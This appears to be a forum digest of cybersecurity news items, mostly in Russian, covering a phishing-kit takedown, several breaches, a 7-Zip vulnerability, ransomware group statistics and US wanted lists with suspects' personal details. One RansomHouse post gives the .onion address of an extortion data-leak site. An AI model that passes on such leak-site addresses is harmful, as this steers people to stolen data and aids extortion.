В ходе операции был арестован 21-летний индонезиец, обвиняемый в администрировании платформы, а также двое других причастных к её работе лиц — один также проживал в Индонезии, а другой в Японии. Полиция конфисковала электронные устройства и ряд предметов роскоши, принадлежащих подозреваемым, а функционирование самой платформы было нарушено.
По данным компании Group-IB, также участвовавшей в операции, инструменты для хакерских атак 16shop распространялись на подпольных форумах с ноября 2017 года и были проданы более чем 70 000 пользователям в 43 странах. Эти инструменты помогали мошенникам обманывать интернет-пользователей с помощью фишинговых писем и похищать их личные или банковские данные для последующей кражи денежных средств.
Комплекты для фишинга были нацелены на кражу учётных данных и платёжных реквизитов пользователей популярных сервисов, таких как Apple, PayPal, American Express, Amazon и Cash App. Многие из них продавались по относительно скромной цене — от 60 до 150 долларов в зависимости от целевого бренда. Например, комплект для Amazon был почти на 90 долларов дешевле, чем для American Express.
По данным Group-IB, с помощью инструментов 16shop было создано более 150 000 фишинговых доменов. Заказчики платформы атаковали пользователей в Германии, Японии, Франции, США, Великобритании, Таиланде и других странах. Хотя подозреваемые проживали в Азии, серверы 16shop были размещены в компании, базирующейся в США.
Инструменты типа «фишинг как сервис» особенно опасны, поскольку позволяют автоматизировать кибератаки, давая возможность любому человеку запустить фишинговую атаку в несколько кликов, отмечает Интерпол.
Даже киберпреступники с базовыми навыками в области хакинга и программирования могут быстро и в больших количествах развёртывать фишинговые страницы с помощью таких инструментов, какие можно было приобрести в 16shop, подчёркивают эксперты Group-IB.
source:
interpol.int/en/News-and-Events/News/2023/Notorious-phishing-platform-shut-
down-arrests-in-international-police-operation
group-ib.com/media-center/press-releases/interpol-16shop
Согласно иску, журналист умышленно ввел в заблуждение своих читателей об утечке данных.
Американская компания Ubiquiti Networks на этой неделе подала в суд на журналиста Брайана Кребса, специализирующегося на кибербезопасности, и потребовала от него $425 тыс. компенсации за обвинение компании в сокрытии кибератаки.
Согласно иску, Кребс умышленно ввел в заблуждение своих читателей об утечке данных и последующей попытке шантажа.
Как заявила компания, она уведомила своих клиентов о кибератаке и проинструктировала их о необходимых дополнительных мерах предосторожности для обеспечения большей безопасности их данных. Кроме того, Ubiquiti сообщила об инциденте Комиссии по ценным бумагам и биржам США, но Кребс умышленно проигнорировал все предпринятые ею действия, чтобы повысить доход от рекламы, привлекая таким образом трафик на свой сайт KrebsonSecurity.
Как сообщается в иске, единственным источником, на который опирался Кребс, был сотрудник Ubiquiti Николас Шарп (Nickolas Sharp), на котором лежит ответственность за кибератаку.
1 декабря 2021 года Федеральная прокуратура Южного округа штата Нью-Йорк обвинила Шарпа в том, что под видом анонимного хакера он похитил у Ubiquiti конфиденциальные данные и вымогал у компании деньги.
По словам представителей Ubiquiti, Кребс предположительно прочитал пресс-релиз и знал, что его главный источник обвиняется в причастности к кибератаке. Однако он опубликовал статью на своем сайте на следующий день, повторно обвинив Ubiquiti и заставив читателей думать, будто его более ранее сообщение об атаке базировалось не на данных, полученных от Шарпа.
source: storage.courtlistener.com/recap/gov.uscourts.vaed.521759/gov.uscourts.vaed.521759.1.0.pdf
Всеобщий интерес к невзаимозаменяемым токенам (NFT, non-fungible token) не обошел стороной и мошенников. Эксперты компании Bolster заметили, что торговая площадка Rarible (rarible.com) стала целью тайпсквоттеров, которые распространяют малварь, занимаются мошенничеством и так далее.
Исследователи обнаружили ряд тайпсквоттерских доменов, нацеленных на пользователей Rarible. К примеру, rarbile[.]com, маскирующийся под настоящий rarible.com. Так как поисковые системы неплохо справляются с тем, чтобы скрывать такие домены из результатов поиска, мошенники часто используют для распространения вредоносных ссылок WhatsApp и Telegram, а также посты в социальных сетях, прямые сообщения в социальных сетях или даже покупают рекламу.
Еще один пример атаки на Rarible — домен wwwrarible[.]com, без точки между www и rarible. Когда посетители по ошибке попадают на этот адрес, они перенаправляются на сайт, предлагающий поддельное обновление для Firefox. Одно из браузерных расширений, на которые сайт направлял жертв на днях, внедряет рекламу на все сайты, которые посещает пользователь, а также отслеживает всю активность человека в интернете.
Другие домены, обнаруженные Bolster (rarbile[.]com, rarbile[.]com и rarbile[.]com) перенаправляют посетителей на различные мошеннические ресурсы. Это могут быть фейковые игры с вращающимся колесом, поддельные сайты знакомств, предназначенные для сбора информации, а также фальшивая техподдержка или сайты, распространяющие пакеты нежелательного и рекламного ПО.
Издание Bleeping Computer пишет, что один из таких «наборов» софта установил майнер криптовалюты на тестовую машину журналистов, однако они не смогли воспроизвести это при последующих посещениях сайта.
Аналитики Bolster прогнозируют, что мошенники и далее продолжат эксплуатировать тему NFT, создавая поддельные торговые площадки, которые крадут криптовалюту покупателей, поддельные NFT, выдавая себя за художников, а также устраивая поддельные раздачи подарков.
Источник: xakep.ru/2021/04/16/rarible-typosquatting/
A group of security researchers known as the Secret Club took to Twitter to report a remote code execution bug in the Source 3D game engine developed by Valve and used for building games with tens of millions of unique players.
A vulnerability in the game engine propagates to products built with it. In this case, multiple game titles built with Source are affected and require a patch to eliminate the risk to users.
One of the researchers in the group says that they disclosed the vulnerability
to Valve about two years ago, yet it continues to affect the latest release of
Counter Strike: Global Offensive (CS:GO).
Some of the games that utilize Valve's Source engine include Counter-Strike,
Half-Life, Half-Life 2, Garry's Mod, Team Fortress, Left 4 Dead, and Portal.
What irks the group is that after all this time they cannot publish the technical details about the bug because the bug is still affecting some games.
Florian, a student passionate about reverse engineering, reported the remote code execution (RCE) flaw two years ago through Valve’s bug bounty program on HackerOne.
He told BleepingComputer that the vulnerability is a memory corruption in the Source engine code, so it’s present in multiple game titles. Exceptions are games built with Source 2 or those that run a modified version of the Source engine, like Titanfall.
However, among the games affected is CS:GO, whose latest update was on March 31. Last month, the game counted close to 27 million unique players, according to stats on the [game’s page](https://blog.counter- strike.net/index.php/2021/03/33573/).
In a conversation with BleepingComputer, Florian said that CS:GO still had the vulnerable Source code on April 10th and the bug could be exploited to run arbitrary code on a machine running the game.
He made a demo video showing how an attacker could exploit the vulnerability and execute code on a target computer by simply sending a Steam game invitation to the victim.
The last Florian heard from Valve was about six months ago, when Valve paid him a bounty and said that it was in the process of fixing the problem, and that it had addressed it in one specific game using the Source engine.
The researcher did not disclose which game received the fix but told us that he was able to confirm Valve’s actions.
“We intentionally did not mention that because we do not want people to search
for the patch in the game binaries as this would greatly reduce the effort to
rebuild the exploit for all the other unpatched games” - Florian
Florian is a member of the Secret Club,
a non-profit group of reverse engineers who complained on Twitter over Valve
taking so long to address the issue in all games.
Some bug bounty programs on HackerOne have a policy that allows researchers to disclose exploits or vulnerabilities if a fix is not available after a reasonable period like 90 or 180 days. Valve is not among them.
While Valve does not actively prevent Florian from sharing the details, the researcher has strong ethical principles and knows that full disclosure would put millions of users at risk.
Carl Schou, a leading member of the Secret Club, told BleepingComputer that an attacker could leverage this RCE vulnerability to steal sensitive information like credentials or banking information.
Secret Club has published multiple videos showcasing exploits of RCE bugs in CS:GO from multiple researchers claiming that Valve ignored them for long periods, from five months to a year.
The one below - from Brymko, Carl Smith, and Simon Scannell - shows an exploit of a Source engine RCE flaw when joining a malicious community server.
Here's another one where RCE is also achieved after connecting to a malicious server. Software engineer Bien Pham says that they reported it to Valve last year on April 2 and the company ignored them.
It is unclear if all the videos show demonstration of the same remote code execution bug.
BleepingComputer reached out to Valve earlier today for comment about Florian’s vulnerability disclosure through HackerOne but has not heard from the company by publishing time. We will update the article when a statement from Valve becomes available.
Компания ExpressVPN [объявила](https://www.expressvpn.com/blog/lightway-open- source-security-audit/) об открытии исходных текстов реализации протокола Lightway, разработанного для достижения минимального времени установки соединения при сохранении высокого уровня безопасности и надёжности. Код написан на языке Си и распространяется под лицензией GPLv2. Реализация очень компактная и уместилась в две тысячи строк кода. Заявлена поддержка платформ Linux, Windows, macOS, iOS, Android, маршрутизаторов (Asus, Netgear, Linksys) и браузеров. Для сборки требуется применение сборочных систем Earthly и Ceedling. Реализация оформлена в виде библиотеки, которую можно использовать для интеграции функций клиента и сервера VPN в свои приложения.
В коде задействованы готовые проверенные криптографические функции, предоставляемые библиотекой wolfSSL, уже используемой в решениях, получивших сертификат FIPS 140-2. В штатном режиме протокол использует UDP для передачи данных и DTLS для создания шифрованного канала связи. В качестве опции для обеспечения работы в ненадёжных или ограничивающих UDP сетях, сервером предоставляется более надёжный, но менее быстрый, потоковый режим, позволяющий передавать данные поверх TCP и TLSv1.3.
Проведённые компанией ExpressVPN тесты показали, что по сравнению с о старыми протоколами протоколами (ExpressVPN поддерживает L2TP/IPSec, OpenVPN, IKEv2, PPTP, WireGuard и SSTP, но не детализируется с чем именно было произведено сравнение), переход на Lightway позволил сократить время установки соединения в среднем в 2.5 раза (в более, чем половине случаев канал связи создаётся менее чем за секунду). Новый протокол также дал возможность на 40% снизить число разрывов соединений в ненадёжных мобильных сетях, имеющих проблемы с качеством связи.
Развитие эталонной реализации протокола будет производиться на GitHub с [предоставлением](https://github.com/expressvpn/lightway- core/blob/main/CONTRIBUTING.adoc) возможности участия в разработке представителей сообщества (для передачи изменений требуется подписать CLA- соглашение о передаче имущественных прав на код). К сотрудничеству в том числе приглашаются другие VPN-провайдеры, которые без ограничений могут использовать предложенный протокол.
Безопасность реализации [подтверждена](https://cure53.de/pentest- report_lightway.pdf) результатом независимого аудита, выполненного компанией Cure53, в своё время проводившей аудит NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В целом качество кода было оценено как высокое, но, тем не менее, проверка выявила три уязвимости, которые могут привести к отказу в обслуживании, и одну уязвимость, которая позволяет использовать протокол в качестве усилителя трафика при проведении DDoS-атак. Указанные проблемы уже устранены, а высказанные замечания по улучшению кода учтены. При аудите также обращено внимание на известные уязвимости и проблемы в задействованных сторонних компонентах, таких как libdnet, WolfSSL, Unity, Libuv и lua-crypt. В основном проблемы несущественные, за исключением MITM в WolfSSL (CVE-2021-3336).
В Московском психолого-социальном университете (МПСУ) провели исследование,
которое показало, что с увеличением стажа работы программистов усиливается их
склонность к одиночной работе и проявляется профессиональная деформация.
Отмечается, что отсутствие эмоций в машинных алгоритмах может снижать уровень
эмоционального интеллекта программистов, влияя на их способность к выражению и
восприятию эмоций. Работа программистов, востребованная в условиях
стремительного технического прогресса, требует написания, обновления и
развития программного обеспечения, что делает данную проблему особенно
актуальной для психологов.
Источник: https://naked-science.ru/article/column/psihologi-rasskazali-pro
Сокращено благодаря GPT
Spoiler: Моё личное мнение
Поэтому уровень социального взаимодействия у представителей этой профессии, как правило, ниже, чем в большинстве других.
Click to expand...
Лично основываясь на своём опыте, могу уверенно сказать что это так, я 8 лет назад мог спокойно общаться с людьми, знакомиться и никак не стесняться. Я помню мне девушка понравилась, узнал что она будет в конференции для книжников (там театр, потом про новую книгу и подпись), я ради того чтобы познакомиться пошел туда, познокомился с двумя другими девушками, подошел к ней, она меня отшила, познакомился с коллегой её брата, всё ещё общаемся раз в год лол. А сейчас, я даже у кассы еле еле заказываю что-то. И безразлично девочка/парень, общаться у меня не выходит. Не знаю как, но кибер сфера странно влияет на меня именно в этой теме.
CNA Financial, a leading US-based insurance company, has suffered a cyberattack impacting its business operations and shutting down its website.
CNA is considered the sixth-largest commercial insurance company in the USA, according to the Insurance Information Institute, and offers a wide range of insurance products, including cyber insurance policies.
Starting today, CNA's website began displaying a message stating that they are
"currently experiencing a network disruption that is impacting some of our
systems. We are working to address these issues to minimize the disruption to
you."
If you have first-hand information about this or other unreported
cyberattacks, you can confidentially contact us on Signal at +16469613731 or
on Wire at @lawrenceabrams-bc.
CNA website
outage
Sources have told BleepingComputer that the company suffered a cyberattack
that has disrupted business operations and forced them to shut down specific
systems.
BleepingComputer has not been able to verify if the outage is caused by a ransomware attack, though it appears likely according to a source familiar with the attack.
Other sources have told [The Insurer](https://www.theinsurer.com/news/cna- systems-down-after-suspected-cyber-attack/14925.article) that the attack is disrupting the underwriting and claims side of the business, likely due to systems becoming unavailable.
In an updated statement on their website, CNA has confirmed that a cyberattack is causing network disruption, including corporate email. To be safe, CNA also confirmed that they disconnected their systems from the network.
The full statement from CNA can be read below.
"On March 21, 2021, CNA determined that it sustained a sophisticated cybersecurity attack. The attack caused a network disruption and impacted certain CNA systems, including corporate email.
Upon learning of the incident, we immediately engaged a team of third-party forensic experts to investigate and determine the full scope of this incident, which is ongoing. We have alerted law enforcement and will be cooperating with them as they conduct their own investigation.
Out of an abundance of caution, we have disconnected our systems from our network, which continue to function. We’ve notified employees and provided workarounds where possible to ensure they can continue operating and serving the needs of our insureds and policyholders to the best of their ability.
The security of our data and that of our insureds’ and other stakeholders is of the utmost importance to us and we are committed to continuing to serve them as we work to resolve this issue. Should we determine that this incident impacted our insureds’ or policyholders’ data, we’ll notify those parties directly." - CNA.
Click to expand...
Attacks on insurance carriers are particularly dangerous as they could allow a ransomware operation to create a list of future targets covered under a cyber insurance policy.
Depending on the circumstances, it is not uncommon for insurance companies to pay the insured victims' ransom.
Due to this, the REvil ransomware operation stated in a [recent interview](https://therecord.media/i-scrounged-through-the-trash-heaps-now-im- a-millionaire-an-interview-with-revils-unknown/) that insurers are valuable targets to create lists of potential targets who are more likely to pay a ransom.
"Yes, this is one of the tastiest morsels. Especially to hack the insurers first—to get their customer base and work in a targeted way from there. And after you go through the list, then hit the insurer themselves," REvil's 'Unknown' told the TheRecord.
While this attack has not been confirmed to be a ransomware attack, if it is, the threat actors likely stole business data before encrypting devices.
Celg Geração e Transmissão (Celg GT) – reported, on the morning of this Friday, the 19th, that it suffered, during the night, a cyber attack that left access to the entire corporate network of applications and files compromised.
It has not yet been possible to identify the extent of the damage or even specify the origin of the attack, but since the early hours of the day, the Information Technology Superintendence says that the company is following all security protocols, including suspending its operation computerized environment to protect the integrity of the information and, at the same time, to safeguard the backups.
[https://www.databreaches.net/br-hac...-operation-of-celg-gt-applications-and- files/](https://www.databreaches.net/br-hacker-attack-compromises-operation- of-celg-gt-applications-and-files/)
В рамках совместной операции правоохранительные органы США, Германии, Нидерландов и Румынии отключили инфраструктуру подпольной торговой площадки Slilpp.
Площадка работала с 2012 года и специализировалась на продаже украденных учетных, включая логины и пароли для банковских счетов, аккаунтов для платежей online, интернет-магазинов и пр. В настоящее время более десятка человек были арестованы по подозрению в причастности к рынку Slilpp, сообщается в пресс- релизе Минюста США.
Полиция изъяла серверы, на которых хостилась инфраструктура Slilpp, а также различные домены, используемые площадкой. На момент изъятия на сайте предлагались учетные данные, принадлежащие 1,4 компаниям по всему миру.
Хотя полный масштаб убытков от деятельности площадки пока подсчитать не удалось, по некоторым оценкам они составили более $200 млн только в США.
• Source: justice[.]gov/opa/pr/slilpp-marketplace-disrupted-international- cyber-operation
Специалисты по кибербезопасности зафиксировали активность нового вируса в
мессенджере Telegram.
Пользователи мессенджера Telegram могут столкнуться с последствиями нового
опасного вируса. Известно, что троян удаленного доступа FatalRAT не только
крадет данные россиян, но и поражает систему безопасности устройства, на
котором установлен мессенджер.
Специалисты по кибербезопасности компании AT&T рассказали о новом трояне особого типа, который распространяет каналах фейковые новости.
Вредоносная программа проводит атаки дистанционно и распространяется внутри каналов и чатов.
Троян FatalRAT спрятан в гиперссылках, по которым могут пройти потенциальные жертвы. С целью повышения доверия к вредоносной ссылке киберпреступники завлекают жертв с виду безобидными ресурсами, в том числе фейковыми копиями СМИ.
При этом зловредное ПО способно не только управлять внешними соединениями и веб-браузерами, но и вносить изменения в систему без ведома владельца устройства. Под угрозой также оказываются одноразовые пароли, рассылаемые банками и другими сервисами в качестве одной из ступеней аутентификации. В AT&T считают, что этот вирус представляет собой угрозу нового типа, на основе которой будут создавать более совершенные типы вредоносных программ.
Мужчине грозит до 10 лет тюрьмы за создание фейковой новости о гибели 9 человек.
Мужчине в Китае грозит до 10 лет тюрьмы после того, как он был арестован полицией за создание и распространение в соцсетях фальшивой новости о крушении поезда, которая привела к гибели 9 человек.
В поддельной новостной статье утверждалось, что в результате крушения поезда 25 апреля погибли 9 человек. Китайская киберполиция обвиняет этого человека в «использовании технологии ИИ для создания ложной информации», что является первым арестом такого рода в Китае и в мире.
В США и других западных странах создание дипфейков с использованием искусственного интеллекта не является незаконным, если только контент не имеет злого умысла. Примеры такого умысла включают порнографические подделки лица другого человека без его согласия или несовершеннолетних детей, нарушение авторских прав, интеллектуальной собственности или клевету.
К тому времени, когда полиции стало известно о фальшивой истории, она набрала более 15 000 просмотров и была размещена более чем в 20 аккаунтах на платформе для ведения блога, управляемой китайской компанией Baidu.
Полиция провела обыск в доме подозреваемого и конфисковала его компьютер в качестве улики. По данным полиции, арестованный признался в создании различных версий фальшивой истории, вводя фрагменты других популярных статей прошлых лет в ChatGPT. После создания новости мужчина загрузил её различные интерпретации в несколько блогов, которые он создал на платформе Baidu.
Согласно китайскому законодательству, лицо, признанное виновным в размещении и распространении ложных новостей или слухов в Интернете, подвергается максимальному наказанию в виде 5 лет, но если обстоятельства считаются чрезвычайными (как в нашем случае), срок увеличивается до 10 лет.
Буквально на прошлой неделе производитель топовых видеокарт NVIDIA заявил об аппаратном ограничении майнинга популярных криптовалют на своих видокартах последней модели, в частности GeForce RTX 3060.
Майнеры начали майнить другую альтернативную криптовалюту, такую как Ravecoin. Эти альт-монеты используют разные алгоритмы, и их скорость хеширования не ограничивалась NVIDIA.
Но сейчас ребята сообщили, что ограничения на майнинг были успешно взломаны для Ethereum.
"В драйвере NVIDIA и BIOS хода ещё нет, но ограничения уже нарушены на уровне программного обеспечения для самого майнинга " - радостно сообщают энтузиасты.
Секретная служба США опубликовала список «самых разыскиваемых беглецов». В него вошли несколько лиц, преступления которых связаны с криптовалютами.
Большинство попавших в список являются гражданами России и Украины, которых обвиняют в ряде финансовых преступлений, включая мошенничество с ценными бумагами и отмывание средств.
Среди фигурантов списка оказались граждане РФ Данил Потехин и Дмитрий Карасавиди. Власти США утверждают, что они организовали фишинговую кампанию, нацеленную на пользователей криптовалютных платформ, вывели часть незаконно полученных средств и манипулировали рынками цифровых активов.
В список также попал Рашад Ламар Таллох (Rashawd Lamar Tulloch). Его обвиняют в отмывании преступных средств через биткоин.
Помимо этого, Секретная служба США разыскивает двух граждан Украины Артема Радченко и Александра Еременко. По данным американских властей, они взломали компьютеры Комиссии по ценным бумагам и биржам (SEC) и использовали полученную информацию для манипуляций на рынке. За информацию, которая поможет арестовать их, назначена награда в $1 млн за каждого.
Гражданин Коста-Рики Аллан Гарсия, также оказавшийся в списке, обвиняется в управлении платежной системой Liberty Reserve. Ее использовали для отмывания средств и проведения незаконных операций. Власти США закрыли площадку в 2013 году.
• Source: https://www.secretservice.gov/investigation/mostwanted
ALIASES: Роман Сергеевич Котов, “zSeven,” “7even”
DOB: June 18, 1981
NATIONALITY: Russia
https://www.justice[.]gov/usao-nj/pr/five-indicted-new-jersey-largest-known- data-breach-conspiracy
](https://www.secretservice.gov/investigation/mostwanted/kotov)
www.secretservice.gov
ALIASES: Данил Потехин, “cronuswar”
DOB: N/A
NATIONALITY: Russia
https://www.justice[.]gov/usao-ndca...defraud-multiple-cryptocurrency- exchanges-and

](https://home.treasury.gov/news/press-releases/sm1123)
Washington - Today, in a coordinated action with the U.S. Department of Justice and the U.S. Department of Homeland Security, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned two Russian nationals for their involvement in a sophisticated phishing campaign...
 home.treasury.gov
ALIASES: Александр Витальевич Еременко, “Zl0m,” “Lamarez”
DOB: July 23, 1991
NATIONALITY: Ukraine
https://www.justice[.]gov/usao-nj/p...-computer-hacking-and-securities-fraud- scheme
https://www.justice[.]gov/usao-nj/p...hacking-and-securities-fraud-scheme- targeting

](https://www.state.gov/oleksandr-vitalyevich-ieremenko/)
[Wanted Poster in Russian] [306 KB] NAME: Oleksandr Vitalyevich Ieremenko ALIASES: Unknown DOB: July 23, 1991 POB: Kyiv, Ukraine NATIONALITY: Ukrainian CITIZENSHIP: Ukrainian HEIGHT: Unknown WEIGHT: Unknown HAIR COLOR: Brown EYE COLOR: Brown From on or about February 2016 through on or about...
 www.state.gov
ALIASES: Артем Вячеславович Радченко
DOB: June 4, 1992
NATIONALITY: Ukraine
https://www.justice[.]gov/usao-nj/p...hacking-and-securities-fraud-scheme- targeting

](https://www.state.gov/artem-viacheslavovich-radchenko/)
[Wanted Poster in Russian] [306 KB] NAME: Artem Viacheslavovich Radchenko ALIASES: Unknown DOB: June 14, 1992 POB: Kyiv, Ukraine NATIONALITY: Ukrainian CITIZENSHIP: Ukrainian HEIGHT: 5’8” WEIGHT: 135 lbs HAIR COLOR: Brown EYE COLOR: Brown From on or about February 2016 through on or about...
 www.state.gov
ALIASES: Дмитрий Вадимович Карасавиди
DOB: July 9, 1985
NATIONALITY: Russia
https://www.justice[.]gov/usao-ndca...defraud-multiple-cryptocurrency- exchanges-and

](https://home.treasury.gov/news/press-releases/sm1123)
Washington - Today, in a coordinated action with the U.S. Department of Justice and the U.S. Department of Homeland Security, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned two Russian nationals for their involvement in a sophisticated phishing campaign...
 home.treasury.gov
ALIASES: Фархаду Рауфу Оглы Манохину, Fedor Raufovich, “fr.usa”
DOB: April 24, 1990
NATIONALITY: Russia
ALIASES: Павло Павлович Дубовий
DOB: February 18, 1983
NATIONALITY: Ukraine
https://www.justice[.]gov/usao-nj/p...-computer-hacking-and-securities-fraud- scheme
В свободном архиваторе 7-Zip выявлена уязвимость ([CVE-2022-29072](https://security- tracker.debian.org/tracker/CVE-2022-29072)), позволяющая выполнить произвольные команды с привилегиями SYSTEM через перемещение специально оформленного файла с расширением .7z в область c подсказкой, показываемой при открытии меню "Help>Contents". Проблема проявляется только на платформе Windows и вызвана сочетанием неверной настройки библиотеки 7z.dll и переполнением буфера.
Примечательно, что после уведомления о проблеме разработчики 7-Zip не признали уязвимость и заявили, что источником уязвимости является процесс Microsoft HTML Helper (hh.exe), запускающий код при перемещении файла. Исследователь, выявивший уязвимость, считает, что hh.exe лишь косвенно участвует в эксплуатации уязвимости, а указанная в эксплоите команда запускается в 7zFM.exe как дочерний процесс. Причинами возможности проведения атаки через подстановку команд (command injection) называются переполнение буфера в процессе 7zFM.exe и неверная настройка прав для библиотеки 7z.dll.
В качестве примера продемонстрирован пример [файла справки](https://github.com/kagancapar/CVE-2022-29072/blob/main/command-exec- basic-7zip/7zip.html), запускающего "cmd.exe". Также заявлено о подготовке эксплоита, позволяющего получить привилегии SYSTEM в Windows, но его код планируют опубликовать после выпуска обновления 7-Zip с устранением уязвимости. Так как исправления пока не опубликованы в качестве обходного пути защиты предлагается ограничить программе 7-zip доступ только возможностью чтения и запуска.
• Video: [https://user- images.githubuserconte...4035-d40ca72a-7dbc-425f-ade2-3820cfababb2.mp4](https://user- images.githubusercontent.com/33525376/163654035-d40ca72a-7dbc-425f-ade2-3820cfababb2.mp4)
Что может предложить новинка и как она повлияет на развитие отрасли в целом?
Компания Google[ объявила](https://cloud.google.com/blog/products/identity- security/introducing-chrome-enterprise-premium) о запуске Chrome Enterprise Premium — новой версии своего веб-браузера для корпоративных пользователей, дополненной технологиями искусственного интеллекта для повышения безопасности.
Использование «прокачанного браузера» обойдётся компаниям в $6 на пользователя за месяц. Событие весьма резонансное, особенно учитывая, что взимание платы за использование веб-браузера в последний раз практиковалось в далёком 1995 году компанией Netscape с её интернет-браузером Navigator, который не выдержал конкуренции с Internet Explorer и быстро стал бесплатным.
За последние годы многие аналитики, включая компанию Gartner(исследовательская компания, которая специализируется на изучении рынка информационных технологий), предсказывали, что к 2030 году браузеры станут ключевыми платформами для распространения программного обеспечения, сбора данных, управления доступом и обеспечения удалённой работы в корпоративной сфере.
В свете этих прогнозов, Google, цитируя Gartner, представляет Chrome Enterprise Premium как первый шаг в направлении новых моделей монетизации браузеров.
Париса Табриз, вице-президент Google по Chrome, подчёркивает, что Chrome уже является лидером в области безопасности браузеров, устанавливая стандарты и лучшие практики для всей индустрии. Однако Chrome Enterprise Premium обещает ещё более прокачанные функции безопасности за дополнительную плату.
Ключевой особенностью обозревателя станет «Context-aware access control» (Управление доступом с учетом контекста) — служба, направленная на снижение рисков утечки данных.
Помимо улучшенных защитных возможностей, подписчики получат расширенный контроль за политиками безопасности, обновлениями программного обеспечения, поддержку различных протоколов, а также продвинутые возможности по отчётности и проведения форензических исследований.
Также в Enterprise Premium включены функции защиты данных и противодействия угрозам, включая сканирование на вредоносные программы, динамическую фильтрацию URL и категоризацию сайтов.
Данный шаг Google может быть воспринят в штыки многими скептиками, однако он так или иначе приведёт к новой эре веб-браузеров, где беспрецедентная безопасность и продвинутые возможности для корпоративного сектора станут ключевыми требованиями к ведущим браузерным платформам.
Взимание платы за расширенные возможности сигнализирует о том, что веб- браузеры превращаются в мощные бизнес-инструменты, совмещающие в себя сразу множество функций, а не просто выполняющие роль средства доступа к сети.
Вне зависимости от того, как к этому отнесутся простые пользователи, вероятно, вскоре это станет повсеместной моделью монетизации, особенно когда в игру вступят и другие игроки рынка веб-браузеров.
За хостинг-сервисом Spamdot, который был одним из лидеров в своем сегменте в 2005-2013 годах, стоят два россиянина из Череповца. Но если история одного из них достаточно известна, то второй оставался загадкой для широкой общественности, хотя американское правосудие все знает на протяжении как минимум нескольких лет. Увязать ник на Spamdot с конкретными именем и фамилией удалось ИБ-журналисту Брайану Кребсу (Brian Krebs).
Он напомнил, что во главе форума стояли пользователи Icamis и Salomon. Площадка стала родным домом для владельцев многих ботнетов, которые Кребс называет «самыми отвратительными в мире», а также для распространителей вредоносов, вроде Rustock, Cutwail, Mega-D, Festi, Waledac и Grum. Основатели ресурса также принимали активное участие в заражениях через рассылку спама и постоянно собирали пароли и другие данные с устройств жертв. В дальнейшем они использовались для атак на физические и юридические лица в США.
Личность Salomon была установлена без особых затруднений. Сверив адрес используемой им на Spamdot почты с базами данных служб отслеживания утечек, сначала американские силовики, а потом и Кребс вышли на жителя Череповца Александра Гричушкина. Для него собственная неосмотрительность в киберпространстве имела губительные последствия: он был арестован в 2020 году за пределами России и предстал перед судом по обвинению в создании при участии троих подельников киберпреступной инфраструктуры, с помощью которой проводились атаки на компании и граждан в США.
Гричушкин пошел на сделку со следствием, признал вину и получил всего четыре года, которые истекают 8 февраля 2024 года. Сейчас ему всего 36 лет, при этом его жена и дети постоянно проживают в Таиланде.
Как удалось выяснить Кребсу, среди тех троих подельников, о которых американские следователи знали и даже смогли арестовать, вместе с гражданами Эстонии и Литвы, оказался и Icamis. Первая его ошибка — использование череповецких IP-адресов. Вторая — любовь к именам Icamis, Andrew Artz и Andrew Hertz при регистрации различных сервисов и почтовых ящиков, а также указание в качестве владельца учетной записи компании WMPay. В частности, пользователь с ником icamis.ru (домен был зарегистрирован на Andrew Artz) в 2003 году оставил комментарий на форуме череповецкого общеобразовательного лицея АМТЭК, который до сих пор размещен в сети. На этой же площадке упоминается, что фотографии выпускников за 2004 год можно найти на портале 41.wmpay.com.
Проиндексировать снимки не удалось, но сохранились имена 16 учеников. Запись об одном из них, если верить данным Wayback Machine, была в какой-то момент удалена администратором ресурса, который и оказался искомым человеком по имени Андрей Скворцов. Он предстал перед судом по делу Гричушкина, был осужден, но в итоге депортирован из США. Дальнейшее его местонахождение неизвестно.
RansomHouse is new a data leak site group.
They claims they don't hack companies, or deploy ransomware themselves.
They look more like negociators or people who buy hacked data to extort
companies after.
The .onion for those curious: http://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion
Специалисты по кибербезопасности из компании Arete опубликовали подробный отчёт о разнообразных тенденциях и изменениях в ландшафте вымогательских операций за этот год.
Согласно данным исследователей, среднее значение денежного выкупа, которое сейчас требуют вымогатели, составляет 600 тысяч долларов. Примечательно, что в конце прошлого года это значение было примерно в два раза меньше.
Тем не менее, несмотря на то, что аппетиты киберпреступников продолжают расти, процент инцидентов, в результате которых был выплачен выкуп, снизился до 19% в первой половине 2023 года по сравнению с 29% во второй половине прошлого года.
Снижение числа выплат частично объясняется увеличением числа атак, при которых осуществляется только похищение данных, без шифрования (все помнят инцидент с MoveIT Transfer?).
Кроме того, даже в случае шифрования данных компании постепенно расширяют свои возможности по восстановлению нормальной работы без уплаты выкупа. Во многом благодаря резервному копированию.
Также в Arete назвали ТОП-5 вымогательских группировок по количеству и качеству атак, далее поговорим о них.
LockBit — 18,7% наблюдаемых случаев
Хакеры LockBit удерживают первенство в сфере кибервымогательства уже не первый год, во многом из-за постоянного совершенствования своих собственных программных инструментов для шифрования данных, а также крупной сети партнёров-аффилиатов.
Группировка обычно использует технику двойного, а иногда и тройного вымогательства, запуская DDoS-атаки на сеть жертвы. Разумеется, сайты утечек в даркнете также используются в качестве дополнительного рычага давления.
Кроме того, участники LockBit часто прибегают к услугам брокеров начального доступа (IAB), чтобы ускорить проведение атак и поразить как можно большее число компаний.
ALPHV / Blackcat — 18,7% наблюдаемых случаев
Данная группировка возникла в конце 2021 года и нацелена на организации из различных секторов и регионов. Хакеры Blackcat также самостоятельно разрабатывают и поддерживают свой вредоносный софт, демонстрируя постоянные инновации в области вариативности полезных нагрузок и уклонения от обнаружения.
ALPHV / Blackcat использует различные точки входа для заражения сети жертвы, включая фишинговые электронные письма, скомпрометированные учётные данные и атаки методом перебора по протоколу удалённого рабочего стола (RDP).
Хакеры Blackcat нацелены как на машины под управлением Windows и Linux, так и на устройства NAS, которые часто используются для хранения резервных копий и конфиденциальных данных.
Black Basta — 12,9% наблюдаемых случаев
Эта киберпреступная организация возникла в конце 2021 года. Она предлагает сторонним хакерам вымогательский софт собственной разработки по модели RaaS, а значит любой желающий может использовать инфраструктуру Black Basta для запуска собственных атак. Тактика двойного вымогательства довольно часто используется операторами данного софта.
Доставка вредоноса осуществляется в основном через рассылку фишинговых электронных писем с вредоносными вложениями или ссылками.
Royal – 12,9% наблюдаемых случаев
